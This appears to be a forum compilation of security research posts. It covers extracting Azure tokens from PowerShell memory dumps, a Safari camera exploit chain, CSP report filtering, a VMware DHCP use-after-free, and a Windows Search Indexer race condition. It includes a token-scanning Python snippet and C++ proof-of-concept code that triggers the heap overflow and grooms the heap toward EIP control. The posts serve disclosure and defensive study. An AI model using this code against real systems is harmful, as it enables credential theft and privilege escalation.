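# The context JSON in memory contains a "TokenCache" key (marker assumed).
idx = data.find(b'"TokenCache"')
if idx != -1:
    print(f"[+] Possible Azure context JSON near offset {idx:#x}")

# The serialized token cache shows up elsewhere in the dump as a long base64 run.
for match in re.finditer(rb"[A-Za-z0-9+/]{1024,}={0,2}", data):
    print(f"[+] Candidate base64 blob at {match.start():#x} ({len(match.group())} bytes)")

From there, the recovered JSON can be saved to a file and its CacheData field populated with the base64 blob, exactly as described above.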
The finished tool parses the minidump and emits a reconstructed Azure context JSON file. The last step is to import the extracted Azure context file and see if we are able to access Azure. As we can see, Azure access has been obtained, leveraging disconnected session tokens extracted from PowerShell process memory. To make it easy to replicate our findings, we've published the AzureTokenExtractor tool to extract Azure authentication tokens from PowerShell process minidumps. We hope you have enjoyed this blog post. Keep checking back as we add more research, tool, and technique-related posts in the future!
Sursa: https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2
-
iPhone Camera Hack
I discovered a vulnerability in Safari that allowed unauthorized websites to access your camera on iOS and macOS.
Imagine you are on a popular website when all of a sudden an ad banner hijacks your camera and microphone to spy on you. That is exactly what this vulnerability would have allowed. This vulnerability allowed malicious websites to masquerade as trusted websites when viewed on Desktop Safari (like on Mac computers) or Mobile Safari (like on iPhones or iPads). Hackers could then use their fraudulent identity to invade users' privacy. This worked because Apple lets users permanently save their security settings on a per-website basis. If the malicious website wanted camera access, all it had to do was masquerade as a trusted video-conferencing website such as Skype or Zoom.
Is an ad banner watching you?
I posted the technical details of how I found this bug in a lengthy walkthrough here. My research uncovered seven zero-day vulnerabilities in Safari (CVE-2020-3852, CVE-2020-3864, CVE-2020-3865, CVE-2020-3885, CVE-2020-3887, CVE-2020-9784, & CVE-2020-9787), three of which were used in the kill chain to access the camera. Put simply - the bug tricked Apple into thinking a malicious website was actually a trusted one. It did this by exploiting a series of flaws in how Safari was parsing URIs, managing web origins, and initializing secure contexts. If a malicious website strung these issues together, it could use JavaScript to directly access the victim's webcam without asking for permission. Any JavaScript code with the ability to create a popup (such as a standalone website, embedded ad banner, or browser extension) could launch this attack.
I reported this bug to Apple in accordance with the Security Bounty Program rules and used BugPoC to give them a live demo. Apple considered this exploit to fall into the "Network Attack without User Interaction: Zero-Click Unauthorized Access to Sensitive Data" category and awarded me $75,000. The below screen recording shows what this attack would look like if clicked from Twitter.
* victim in screen recording has previously trusted skype.com
Sursa: https://www.ryanpickren.com/webcam-hacking-overview
-
Filtering the Crap, Content Security Policy (CSP) Reports
13 days ago Stuart Larsen #article
It's pretty well accepted that if you collect Content Security Policy (CSP) violation reports, you're going to have to filter through a lot of confusing and unactionable reports. But it's not as bad as it used to be. Things are way better than they were six years ago when I first started down the CSP path with Caspr. Browsers and other User Agents are way more thoughtful about what and when they report. And new additions to CSP such as "script-sample" have made filtering reports pretty manageable. This article will give a quick background, and then cover some techniques that can be used to filter Content Security Policy reports.
What is a Content Security Policy report?
Why filter Content Security Policy reports?
Filtering Techniques
Blacklists
Malformed Reports
Bots
Script-Sample
Browser Age
line-number / column-number analysis
SourceFile / DocumentURI
Other Ideas
Similar Reports From Newer Browser Versions
'Crowd Sourced' Labeling
Conclusion
What is a Content Security Policy report?
If you're new to Content Security Policy, I'd recommend checking out An Introduction To Content Security Policy first. Content Security Policy has a nifty feature called report-uri. When report-uri is enabled, the browser will send a JSON blob whenever it detects a violation of the CSP. (For more info: An Introduction to report-uri). That JSON blob is the report. Here's a random violation report from my personal website https://c0nrad.io:
{
  "csp-report": {
    "document-uri": "https://c0nrad.io/",
    "blocked-uri": "inline",
    "violated-directive": "style-src-elem",
    "source-file": "https://c0nrad.io/",
    "line-number": 8,
    "script-sample": ".something { width: 100%}"
  }
}
Figure: Violation report from c0nrad.io on an inline style
The report has a number of tasty details:
blocked-uri: inline. The blocked-uri was an 'inline' resource.
violated-directive: style-src-elem. The violated directive was a CSS style element (meaning a <style> block as opposed to a "style=" attribute on an HTML element).
source-file / line-number: https://c0nrad.io/ / 8. The inline resource came from the file https://c0nrad.io on line 8. If you view-source of https://c0nrad.io, it's still there.
script-sample: .something { width: 100%}. The first 40 characters are .something { width: 100%}.
These reports are a miracle when getting started with CSP. You can use them to quickly determine where your policy is lacking. You can even use them to build new policies from scratch. That's actually how tools like CSP Generator automatically build new content security policies - just by parsing these reports.
Why filter Content Security Policy reports?
If the violation reports are so amazing, why do we want to filter them? It seems a little counterintuitive at first, but the sad reality is that not all reports are created equal. Here are some of the inline reports that Csper has received on its own policy. Only three of them are from a real inline script in Csper (which I purposely injected):
Figure: Sample violation reports generated by Content Security Policy
For more fun, I highly recommend checking out this amazing list of fun CSP reports: csp-wtf.
What's frustrating is that a large percentage of reports received from CSP are unactionable. They're not really related to the website. These unactionable reports can come from a lot of different places. The most common is extensions and addons. There's also ads, content injected by ISPs, malware, corporate proxies, custom user scripts, browser quirks, and a sprinkle of serious "wtf" reports.
Filtering Techniques
The goal of filtering is to remove the unactionable reports, so that you're only left with reports that should be looked into.
But of course you don't want to filter so much that you lose reports that really should have been analyzed (such as an XSS on your website). The techniques are somewhat listed in order of importance + ease + reliability.
Blacklists
The easiest way to filter out a huge number of reports is by applying some simple blacklisting rules. I think everyone either directly or indirectly has taken a page from Neil Matatall's/Twitter's book back in 2014: https://matatall.com/csp/twitter/2014/07/25/twitters-csp-report-collector-design.html
Some more lists:
https://dropbox.tech/security/on-csp-reporting-and-filtering
https://github.com/getsentry/sentry/blob/master/src/sentry/interfaces/security.py#L20
https://github.com/jacobbednarz/go-csp-collector/blob/b3a8ff39e3835b3b9452898beb20677cee680dd0/csp_collector.go#L59
Depending on your use case, it may be better to classify the reports, and then selectively filter out those classifications later (just in case you actually need the reports). Some buckets I found to work well are 'extension' and 'unactionable'. This technique alone cuts out ~50% of the weird reports.
Malformed Reports
Another easy way to filter reports is to make sure they have all the necessary fields (and that fields like effective-directive actually contain a real directive). If a report is missing some fields, it's probably not worth the time to investigate; it's probably from a very old or incomplete user agent. All the fields can be found in the CSP3 spec.
You could argue that maybe the users being XSS'ed are on a very old browser that doesn't correctly report all fields, and so if you filter them out you're going to miss the XSS that needs to be patched. Which is definitely fair. But with browser auto-updating, I think/hope most people are on a decently recent browser. And also (this should not be a full excuse not to care), people on very outdated browsers probably have a large number of other browser problems to worry about. Also, if multiple users are being XSS'ed, the majority of them are probably on a competent user agent that will report all the fields, so it will be picked up. It comes down to how much time/resources an organization has to dedicate to CSP. Something is better than nothing. And in this case, this something can save you hours, for a pretty small chance of something falling through the cracks. I recommend labeling reports that are missing important fields (or using egregious values) as 'malformed', and just keeping them to the side so they can be skimmed every once in a while.
Bots
Another easy way to filter out 'unactionable' reports is to check whether the User Agent belongs to a bot. A number of web scrapers inject javascript into the pages they are analyzing. (The bots also have CSP enabled, which seems silly at first, but they're probably just using headless Chrome or something.) Some example user agents:
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BuiltWith/1.0; +http://builtwith.com/biup) Chrome/60.0.3112.50 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/61.0.3163.59 Safari/537.36
Prerender (+https://github.com/prerender/prerender)
Mozilla/5.0 (compatible; woorankreview/2.0; +https://www.woorank.com/)
Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)
Since these UserAgents inject their own javascript not related to the website, it's not worth the time investigating them.
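Putting the three ideas above together, a first-pass classifier might look like the following Python sketch. The required fields, blacklist prefixes, and bot patterns are illustrative starting points, not a complete ruleset.

import re

REQUIRED = {"blocked-uri", "document-uri", "violated-directive", "original-policy"}
BLACKLISTED_PREFIXES = ("chrome-extension://", "moz-extension://",
                        "safari-extension://", "ms-browser-extension://")
BOT_UA = re.compile(r"HeadlessChrome|BuiltWith|AhrefsBot|Prerender|woorank", re.I)

def classify(report: dict, user_agent: str) -> str:
    csp = report.get("csp-report", {})
    # Malformed: missing fields that a competent user agent always sends.
    if not REQUIRED.issubset(csp):
        return "malformed"
    # Bots: scrapers injecting their own javascript into the page.
    if BOT_UA.search(user_agent or ""):
        return "bot"
    # Blacklist: extension-injected resources in blocked-uri or source-file.
    for field in ("blocked-uri", "source-file"):
        if str(csp.get(field, "")).startswith(BLACKLISTED_PREFIXES):
            return "extension"
    return "actionable"

A collector endpoint could call classify() on each incoming report, keep everything for later skimming, and only surface the "actionable" bucket for review.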
Script-Sample
If report-sample is enabled (which I highly recommend), you can start filtering out reports based on the first 40 characters in the script-sample field. A good starting point is the csp-wtf list. A quick note of caution, though, for websites running in 'Content-Security-Policy-Report-Only' mode: if you automatically filter out anything that matches these script-samples, an attacker could attempt to use an XSS that starts with one of those strings to avoid detection. If it's a DOM based XSS, it'll be very hard to determine what is an extension injection vs. what is a DOM based XSS (more on that later).
Browser Age
One filtering technique that Csper started supporting this week is filtering on browser age. Older browsers (and less common browsers) have some fun CSP quirks (and sadly probably more malware, toolbars, etc., which all cause unactionable reports), so if you're short on resources, those reports should probably get less attention. So when a report is received, you take the User Agent + version, look up the release date of that User Agent, and if it's older than some time period (2 years), label it as an older user agent. This cuts out around 15% of the reports. The same argument of "what if the XSS victim is using an old browser" still holds. Again, I think it is up to the website's security maturity and available resources to determine what an appropriate level of effort is. But for the average website, giving less attention to browsers more than 2 years old while giving more attention to the rest of the reports - instead of being flooded by reports and doing nothing - is infinitely better. The reports are still there for those who want to look at them.
line-number / column-number analysis
Modern browsers make a good attempt to add line-number/column-number to the violation reports (see the PR for Chrome). So when there's a resource that doesn't have a line-number/column-number, it's a good cause for an eyebrow raise. A lot of reports also use "1" or "0" as the line number. These can also be a great signal for something odd. I found that a line number of 0/1 usually signifies that the resource was "injected" after the fact (as in, it was not part of the original HTML). This could be SPAs (Angular/React) injecting resources, browsers injecting content scripts, or a DOM based XSS. Unfortunately (at least for modern Chrome), I couldn't find a way to determine the difference between a DOM based XSS and something injected by a browser script. For example, a report of a DOM based XSS I injected myself through an Angular innerHTML looks pretty much the same as a lot of extension injections, with a line-number of 1.
But it is still interesting when a report has a line-number of 1. So inline reports can be split into the categories "inline" or "injected". The injected bucket will contain most of the browser stuff, but could also contain DOM based XSS's, so it still needs to be looked at. I hope in the future that source-file will more accurately reflect where the javascript came from, so we can filter out all extension stuff with great ease.
SourceFile / DocumentURI
In a somewhat related vein, stored or reflected XSS's should have a matching source-file/document-uri (obviously not the case for DOM based or more exotic XSS's). In some of the odd reports, the source file will be something external (such as a script from Google Translate). If you're specifically looking to detect a stored/reflected XSS, a mismatch can be a nice indication that the report isn't as useful.
Somewhat related: Firefox also doesn't include a source-file on evals from extensions, which can help reduce eval noise (those can be placed in the extension bucket).
Other Ideas
Similar Reports From Newer Browser Versions
Browsers are getting way better at fully specifying what content came from an extension. For example, one report received from a Firefox/Windows/Desktop UserAgent released 22 days ago had a source-file starting with moz-extension, making it pretty obvious that the report is from an extension. The next report most likely came from the same extension, but from the report alone it's not obvious where it came from. This UserAgent is also Firefox/Windows/Desktop, but released 9 months ago:
{
"csp-report": {
"blocked-uri": "inline",
"column-number": 1,
"document-uri": "https://csper.io/blog/other-csp-security",
"line-number": 1,
"original-policy": "default-src 'self'; connect-src 'self' https://*.hotjar.com https://*.hotjar.io https://api.hubspot.com https://forms.hubspot.com https://rs.fullstory.com https://stats.g.doubleclick.net https://www.google-analytics.com wss://*.hotjar.com; font-src 'self' data: https://script.hotjar.com; frame-src 'self' https://app.hubspot.com https://js.stripe.com https://vars.hotjar.com https://www.youtube.com; img-src 'self' data: https:; object-src 'none'; script-src 'report-sample' 'self' http://js.hs-analytics.net/analytics/ https://edge.fullstory.com/s/fs.js https://js.hs-analytics.net/analytics/ https://js.hs-scripts.com/ https://js.hscollectedforms.net/collectedforms.js https://js.stripe.com/v3/ https://js.usemessages.com/conversations-embed.js https://script.hotjar.com https://static.hotjar.com https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/js; style-src 'report-sample' 'self' 'unsafe-inline'; base-uri 'self'; report-uri https://csper-prod.endpoint.csper.io/",
"referrer": "",
"script-sample": "(() => {\n try {\n // co…",
"source-file": "https://csper.io/blog/other-csp-security",
"violated-directive": "script-src"
}
}
It's not perfect, but it may be possible to group similar reports together and perform the analysis on the latest user agent. You have to be careful, though, that you don't group reports together so aggressively that an attacker could attempt to smuggle XSS's that start with (() => {\n try {\n // co to avoid detection on report-only deployments. Hopefully, as everyone moves to very recent browsers, we can just filter on the source-file. There was also a little chatter about adding the sha256-hash to the report; that would also make this infinitely more feasible (but people would need to be on more recent versions of their browsers to send the new sha256, and by that point we'll already have the moz-extension indicator in the source-file).
'Crowd Sourced' Labeling
Another idea that I've been mulling over is 'crowd sourced' labeling. What if people could mark reports as "unactionable" (somewhat like the csp-wtf list)? Or "this report doesn't apply to my project"? These reports could be aggregated and then displayed to other users of a report-uri endpoint as "other users have marked this report as unactionable". For people just getting started with CSP, this could be nice validation to ignore a report. Or, specifically, if there's an XSS with a known payload, people could mark it as "this was a real XSS", and other people would get that indication when there's a similar report in their project. Due to my privacy/abuse concerns, this idea has been kicked down the road.
It would need to be rock solid. As of right now (for Csper) there is no way for a customer to glean information about another customer, and obviously this is how things should be. But maybe in the future there could be an opt-in anonymized feature flag for this. Not for many months, at least. If this is interesting to you (because it's a good idea, or a terrible idea), I'd love to hear your thoughts! stuart@csper.io.

Conclusion

A dream I have is that one day almost everyone could actually use Content-Security-Policy-Report-Only and get value with almost no work. If individuals are using the latest user agents, and if an endpoint's classification is good enough, websites could roll out CSP in report-only mode for a few weeks to establish a baseline of known inline reports and their positions. The endpoint would then know where the expected inline resources exist, and would only alert website owners on new reports it thinks are an XSS. XSS detection for any website with almost no work. We're not there yet. But browsers are getting better at what they send, and classification of reports is getting easier. I hope this was useful! If you have any ideas or comments I would love to hear them! stuart at csper.io.

Sursa: https://csper.io/blog/csp-report-filtering
-
CVE-2020-3947: Use-After-Free Vulnerability in the VMware Workstation DHCP Component

April 02, 2020 | KP Choubey

Ever since introducing the virtualization category at Pwn2Own in 2016, guest-to-host escapes have been a highlight of the contest. This year's event was no exception. Other guest-to-host escapes have also come through the ZDI program throughout the year. In fact, VMware released a patch for just such a bug less than a week prior to this year's competition. In this blog post, we look into CVE-2020-3947, which was submitted to the ZDI program (ZDI-20-298) in late December by an anonymous researcher. The vulnerability affects the DHCP server component of VMware Workstation and could allow attackers to escalate privileges from a guest OS and execute code on the host OS.

Dynamic Host Configuration Protocol (DHCP)

Dynamic Host Configuration Protocol (DHCP) is used to dynamically assign and manage IP addresses by exchanging DHCP messages between a DHCP client and server. DHCP messages include DHCPDISCOVER, DHCPOFFER, DHCPRELEASE, and several others. All DHCP messages begin with the following common header structure:

Figure 1 - DHCP Header structure

The Options field of a DHCP message contains a sequence of option fields. The structure of an option field is as follows:

Figure 2 - Option Field Structure

The optionCode field defines the type of option. The value of optionCode is 0x35 and 0x3d for the DHCP message type and client identifier options, respectively. A DHCP message must contain exactly one DHCP message type option. For the DHCP message type option, the value of the optionLength field is 1 and the optionData field indicates the message type. A value of 1 indicates a DHCPDISCOVER message, while a value of 7 indicates a DHCPRELEASE message. These are the two message types that matter for this vulnerability: DHCPDISCOVER is broadcast by a client to obtain an IP address, and the client sends DHCPRELEASE to relinquish an IP address.

The Vulnerability

In VMware Workstation, the vmnetdhcp.exe module provides the DHCP server service to guest machines. It is installed as a Windows service. The vulnerable condition occurs when a DHCPDISCOVER message followed by a DHCPRELEASE message is sent repeatedly to a vulnerable DHCP server. During processing of a DHCPRELEASE message, the DHCP server calls vmnetdhcp!supersede_lease (vmnetdhcp+0x3160). The supersede_lease function then copies data from one lease structure to another. A lease structure contains information such as the assigned client IP address, client hardware address, lease duration, lease status, and so on. The full lease structure is as follows:

Figure 3 - Lease Structure

For this vulnerability, the uid and uid_len fields are important. The uid field points to a buffer containing the string data from the optionData field of the client identifier option. The uid_len field indicates the size of this buffer. supersede_lease first checks whether the string data pointed to by the respective uid fields of the source and destination lease are equal. If these two strings match, the function frees the buffer pointed to by the uid field of the source lease. Afterwards, supersede_lease calls write_lease (vmnetdhcp+0x16e0), passing the destination lease as an argument, to write the lease to an internal table.
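Based on that description, the flawed flow can be sketched roughly in C. The field and function names (uid, uid_len, supersede_lease, write_lease) come from the write-up; the structure layout and everything else are illustrative assumptions, not VMware's actual code:

#include <stdlib.h>
#include <string.h>

/* Illustrative layout only; the real lease structure is shown in Figure 3. */
struct lease {
    unsigned char *uid;     /* client identifier optionData */
    unsigned int   uid_len; /* size of the uid buffer */
    /* ... assigned IP, hardware address, duration, status, ... */
};

void write_lease(struct lease *l); /* writes the lease to an internal table */

void supersede_lease(struct lease *comp /* source */, struct lease *lease /* destination */)
{
    if (comp->uid && lease->uid &&
        comp->uid_len == lease->uid_len &&
        memcmp(comp->uid, lease->uid, lease->uid_len) == 0)
    {
        /* BUG: when a DHCPDISCOVER/DHCPRELEASE sequence makes comp->uid and
         * lease->uid point at the SAME buffer, this free() leaves lease->uid
         * dangling. The patch adds a comp->uid != lease->uid check here. */
        free(comp->uid);
        comp->uid = NULL;
    }
    /* ... copy the remaining fields from comp into lease ... */
    write_lease(lease); /* use-after-free: dereferences lease->uid */
}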
Figure 4 – Compare the uid Fields

Figure 5 - Frees the uid Field

In the vulnerable condition, meaning when a DHCPDISCOVER message followed by a DHCPRELEASE message is repeatedly received by the server, the respective uid fields of the source and destination lease structures actually point to the same memory location. The supersede_lease function does not check for this condition. As a result, when it frees the memory pointed to by the uid field of the source lease, the uid pointer of the destination lease becomes a dangling pointer. Finally, when write_lease accesses the uid field of the destination lease, a use-after-free (UAF) condition occurs.

Figure 6 - Triggering the Bug

The Patch

VMware patched this bug and two lesser-severity bugs with VMSA-2020-004. The patch to address CVE-2020-3947 contains changes in one function: supersede_lease. The patch comparison of supersede_lease in VMnetDHCP.exe version 15.5.1.50853 versus version 15.5.2.54704 is as follows:

Figure 7 - BinDiff Patch Comparison

In the patched version of supersede_lease, after performing the string comparison between the respective uid fields of the source and destination leases, it performs a new check to see if the respective uid fields are actually referencing the same buffer. If they are, the function skips the call to free. Since there are no workarounds listed, the only way to ensure you are protected from this bug is to apply the patch.

Despite being a well-understood problem, UAF bugs continue to be prevalent in modern software. In fact, 15% of the advisories we published in 2019 were the result of a UAF condition. It will be interesting to see if that trend continues in 2020. You can find me on Twitter @nktropy, and follow the team for the latest in exploit techniques and security patches.

Sursa: https://www.zerodayinitiative.com/blog/2020/4/1/cve-2020-3947-use-after-free-vulnerability-in-the-vmware-workstation-dhcp-component
-
Analyzing a Windows Search Indexer LPE bug

March 26, 2020 - SungHyun Park @ Diffense

Introduction

The Jan-Feb 2020 security patches fix multiple bugs in the Windows Search Indexer. Many LPE vulnerabilities in the Windows Search Indexer have been found, as shown above [1]. Thus, we decided to analyze the applied patches in detail and share the results.

Windows Search Indexer

Windows Search Indexer is a Windows service that handles indexing of your files for Windows Search, which fuels the file search engine built into Windows that powers everything from the Start Menu search box to Windows Explorer, and even the Libraries feature. Users can reach the service's interface through a GUI, Indexing Options, as indicated below. All the DB and temporary data produced during the indexing process are stored as files and managed. As is usual for a Windows service, the whole process runs with NT AUTHORITY\SYSTEM privileges. If logic bugs exist around file path handling, they may allow privilege escalation (e.g. a symlink attack). We assumed that Search Indexer might contain such a vulnerability, given that most of the vulnerabilities recently found in Windows services were LPE logic bugs. However, the outcome of our analysis was something else; more details are covered below.

Patch Diffing

The analysis environment was Windows 7 x86, since the updated file there is small, making it easy to spot the differences. We downloaded both patched versions of this module from the Microsoft Update Catalog:

patched version (January Patch Tuesday): KB4534314 [2]
patched version (February Patch Tuesday): KB4537813 [3]

We started with a BinDiff of the binaries modified by the patch (in this case there is only one: searchindexer.exe). Most of the patching was done in the CSearchCrawlScopeManager and CSearchRoot classes. The former was patched in January, and the latter the following month. Both classes contained the same change, so we focused on the CSearchRoot patch. The following figure shows that code was added which uses a lock to securely access shared resources. Since the patch touched the putter and getter functions, we deduced that unsynchronized access to these shared resources gave rise to a race condition vulnerability.

How to Interact with the Interface

We referred to MSDN to see how those classes are used and found that they are all related to the Crawl Scope Manager, whose methods are documented there. MSDN says [4]:

The Crawl Scope Manager (CSM) is a set of APIs that lets you add, remove, and enumerate search roots and scope rules for the Windows Search indexer. When you want the indexer to begin crawling a new container, you can use the CSM to set the search root(s) and scope rules for paths within the search root(s).

The CSM interface is as follows:

IEnumSearchRoots
IEnumSearchScopeRules
ISearchCrawlScopeManager
ISearchCrawlScopeManager2
ISearchRoot
ISearchScopeRule
ISearchItem

For example, adding, removing, and enumerating search roots and scope rules can be written as follows. The ISearchCrawlScopeManager tells the search engine about containers to crawl and/or watch, and items under those containers to include or exclude. To add a new search root, instantiate an ISearchRoot object, set the root attributes, and then call ISearchCrawlScopeManager::AddRoot and pass it a pointer to the ISearchRoot object.
// Add RootInfo & Scope Rule
pISearchRoot->put_RootURL(L"file:///C:\\");
pSearchCrawlScopeManager->AddRoot(pISearchRoot);
pSearchCrawlScopeManager->AddDefaultScopeRule(L"file:///C:\\Windows", fInclude, FF_INDEXCOMPLEXURLS);
// Set Registry key
pSearchCrawlScopeManager->SaveAll();

We can also use ISearchCrawlScopeManager to remove a root from the crawl scope when we no longer want that URL indexed. Removing a root also deletes all scope rules for that URL. We can uninstall the application, remove all data, and then remove the search root from the crawl scope, and the Crawl Scope Manager will remove the root and all scope rules associated with the root.

// Remove RootInfo & Scope Rule
pSearchCrawlScopeManager->RemoveRoot(pszUrl);
// Set Registry key
pSearchCrawlScopeManager->SaveAll();

The CSM enumerates search roots using IEnumSearchRoots. We can use this class to enumerate search roots for a number of purposes. For example, we might want to display the entire crawl scope in a user interface, or discover whether a particular root or the child of a root is already in the crawl scope.

// Display RootInfo
PWSTR pszUrl = NULL;
pSearchRoot->get_RootURL(&pszUrl);
wcout << L"\t" << pszUrl;
// Display Scope Rule
IEnumSearchScopeRules *pScopeRules;
pSearchCrawlScopeManager->EnumerateScopeRules(&pScopeRules);
ISearchScopeRule *pSearchScopeRule;
pScopeRules->Next(1, &pSearchScopeRule, NULL);
pSearchScopeRule->get_PatternOrURL(&pszUrl);
wcout << L"\t" << pszUrl;

We suspected that a vulnerability would arise in the process of manipulating URLs. Accordingly, we started analyzing the root cause.

Root Cause Analysis

We conducted binary analysis focusing on the following functions:

ISearchRoot::put_RootURL
ISearchRoot::get_RootURL

While analyzing ISearchRoot::put_RootURL and ISearchRoot::get_RootURL, we figured out that the object's shared variable (CSearchRoot + 0x14) is referenced by both. The put_RootURL function writes user-controlled data to the memory at CSearchRoot+0x14, and the get_RootURL function reads the data located at CSearchRoot+0x14. Given the patch, it appeared that the vulnerability was caused by this shared variable, and we finally got to the point where the vulnerability originates. The bug is a double fetch of the string length, and it can be triggered as follows:

First fetch: used as the memory allocation size (line 9)
Second fetch: used as the memory copy size (line 13)

If the two fetched sizes differ, a heap overflow may occur, specifically when the second fetch sees a larger size. The plan, therefore, was to change the length of pszURL via the race condition in the window between the allocation and the memory copy.

Crash

Through OleView [5], we were able to see the interface provided by the Windows Search Manager, and we needed to hit the vulnerable functions through the methods of that interface. We could easily test it through the COM-based command line sample code provided by MSDN [6].
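Before moving to the client side, here is a minimal C++ sketch of the double-fetch pattern just described. This is illustrative only, not the actual searchindexer.exe code: g_rootUrl stands in for the shared member at CSearchRoot+0x14, and the mapping of the two fetches onto these exact calls is my assumption:

#include <windows.h>
#include <strsafe.h>

// Stand-in for the shared string at CSearchRoot+0x14, written by put_RootURL.
static PWSTR g_rootUrl;

HRESULT get_RootURL_sketch(PWSTR *ppszUrl)
{
    // First fetch: the length determines the allocation size.
    size_t cch = wcslen(g_rootUrl);
    PWSTR buffer = (PWSTR)CoTaskMemAlloc((cch + 1) * sizeof(WCHAR));
    if (!buffer)
        return E_OUTOFMEMORY;

    // If a concurrent put_RootURL swaps g_rootUrl for a longer string here,
    // the copy below writes past the allocation: heap overflow.

    // Second fetch: the copy is sized from the (possibly replaced) string.
    StringCchCopyW(buffer, wcslen(g_rootUrl) + 1, g_rootUrl);
    *ppszUrl = buffer;
    return S_OK;
}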
And we wrote the COM client code that hits the vulnerable functions as follows:

int wmain(int argc, wchar_t *argv[])
{
    // Initialize COM library
    CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
    // Class instantiate
    ISearchRoot *pISearchRoot;
    CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pISearchRoot));
    // Vulnerable functions hit
    pISearchRoot->put_RootURL(L"Shared RootURL");
    PWSTR pszUrl = NULL;
    HRESULT hr = pISearchRoot->get_RootURL(&pszUrl);
    wcout << L"\t" << pszUrl;
    CoTaskMemFree(pszUrl);
    // Free COM resource, End
    pISearchRoot->Release();
    CoUninitialize();
}

Thereafter, triggering the bug was quite simple. We created two threads: one writing different lengths of data to the shared buffer and the other reading data from the shared buffer at the same time.

DWORD __stdcall thread_putter(LPVOID param)
{
    ISearchRoot *pISearchRoot = (ISearchRoot*)param;
    while (1)
    {
        pISearchRoot->put_RootURL(L"AA");
        pISearchRoot->put_RootURL(L"AAAAAAAAAA");
    }
    return 0;
}

DWORD __stdcall thread_getter(LPVOID param)
{
    ISearchRoot *pISearchRoot = (ISearchRoot*)param;
    PWSTR get_pszUrl;
    while (1)
    {
        pISearchRoot->get_RootURL(&get_pszUrl);
    }
    return 0;
}

Okay, crash! Undoubtedly, the race condition had succeeded before the StringCchCopyW function copied the RootURL data, leading to a heap overflow.

EIP Control

To control EIP, we needed to place an object on the server heap where the vulnerability occurs. We wrote the client code as follows, tracking the heap status.

int wmain(int argc, wchar_t *argv[])
{
    CoInitializeEx(NULL, COINIT_MULTITHREADED | COINIT_DISABLE_OLE1DDE);
    ISearchRoot *pISearchRoot[20];
    for (int i = 0; i < 20; i++)
    {
        CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pISearchRoot[i]));
    }
    pISearchRoot[3]->Release();
    pISearchRoot[5]->Release();
    pISearchRoot[7]->Release();
    pISearchRoot[9]->Release();
    pISearchRoot[11]->Release();
    CreateThread(NULL, 0, thread_putter, (LPVOID)pISearchRoot[13], 0, NULL);
    CreateThread(NULL, 0, thread_getter, (LPVOID)pISearchRoot[13], 0, NULL);
    Sleep(500);
    CoUninitialize();
    return 0;
}

We found that if the client did not release a pISearchRoot object, IRpcStubBuffer objects would remain on the server heap. And we also saw that the IRpcStubBuffer objects remained near the heap location where the vulnerability occurs.

0:010> !heap -p -all
...
03d58f10 0005 0005 [00] 03d58f18 0001a - (busy) <-- CoTaskMalloc return
 mssprxy!_idxpi_IID_Lookup <PERF> (mssprxy+0x75)
03d58f38 0005 0005 [00] 03d58f40 00020 - (free)
03d58f60 0005 0005 [00] 03d58f68 0001c - (busy) <-- IRpcStubBuffer Obj
 ? mssprxy!_ISearchRootStubVtbl+10
03d58f88 0005 0005 [00] 03d58f90 0001c - (busy)
 ? mssprxy!_ISearchRootStubVtbl+10 <-- IRpcStubBuffer Obj
03d58fb0 0005 0005 [00] 03d58fb8 00020 - (busy)
03d58fd8 0005 0005 [00] 03d58fe0 0001c - (busy)
 ? mssprxy!_ISearchRootStubVtbl+10 <-- IRpcStubBuffer Obj
03d59000 0005 0005 [00] 03d59008 0001c - (busy)
 ? mssprxy!_ISearchRootStubVtbl+10 <-- IRpcStubBuffer Obj
03d59028 0005 0005 [00] 03d59030 00020 - (busy)
03d59050 0005 0005 [00] 03d59058 00020 - (busy)
03d59078 0005 0005 [00] 03d59080 00020 - (free)
03d590a0 0005 0005 [00] 03d590a8 00020 - (free)
03d590c8 0005 0005 [00] 03d590d0 0001c - (busy)
 ? mssprxy!_ISearchRootStubVtbl+10 <-- IRpcStubBuffer Obj

In COM, all interfaces have their own interface stub space. Stubs are small memory regions used to support remote method calls during RPC communication, and IRpcStubBuffer is the primary interface for such interface stubs.
In this process, the IRpcStubBuffer supporting pISearchRoot's interface stub remains on the server's heap. The vtable of IRpcStubBuffer is as follows:

0:003> dds poi(03d58f18) l10
71215bc8 7121707e mssprxy!CStdStubBuffer_QueryInterface
71215bcc 71217073 mssprxy!CStdStubBuffer_AddRef
71215bd0 71216840 mssprxy!CStdStubBuffer_Release
71215bd4 71217926 mssprxy!CStdStubBuffer_Connect
71215bd8 71216866 mssprxy!CStdStubBuffer_Disconnect <-- client call : CoUninitialize();
71215bdc 7121687c mssprxy!CStdStubBuffer_Invoke
71215be0 7121791b mssprxy!CStdStubBuffer_IsIIDSupported
71215be4 71217910 mssprxy!CStdStubBuffer_CountRefs
71215be8 71217905 mssprxy!CStdStubBuffer_DebugServerQueryInterface
71215bec 712178fa mssprxy!CStdStubBuffer_DebugServerRelease

When the client's COM is uninitialized, IRpcStubBuffer::Disconnect disconnects all of the object pointer's connections. Therefore, if the client calls the CoUninitialize function, the CStdStubBuffer_Disconnect function is called on the server. This means an attacker can construct a fake vtable and have that function called. However, IRpcStubBuffer was not always allocated at the same heap location, so several tries were needed to construct the heap layout. After several tries, the IRpcStubBuffer object was overwritten with a controllable value (0x45454545) as follows. In the end, we could show that indirect calls to any function in memory are possible!

Conclusion

Most of the LPE vulnerabilities recently found in Windows services were logic bugs, which made analyzing a memory corruption vulnerability in the Windows Search Indexer quite interesting. Such memory corruption vulnerabilities are likely to keep appearing in Windows services, and we should not overlook the possibility. We hope that this analysis will serve as an insight to other vulnerability researchers and be applied to further studies.

Reference

1. https://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments
2. https://www.catalog.update.microsoft.com/Search.aspx?q=KB4534314
3. https://www.catalog.update.microsoft.com/Search.aspx?q=KB4537813
4. https://docs.microsoft.com/en-us/windows/win32/search/-search-3x-wds-extidx-csm
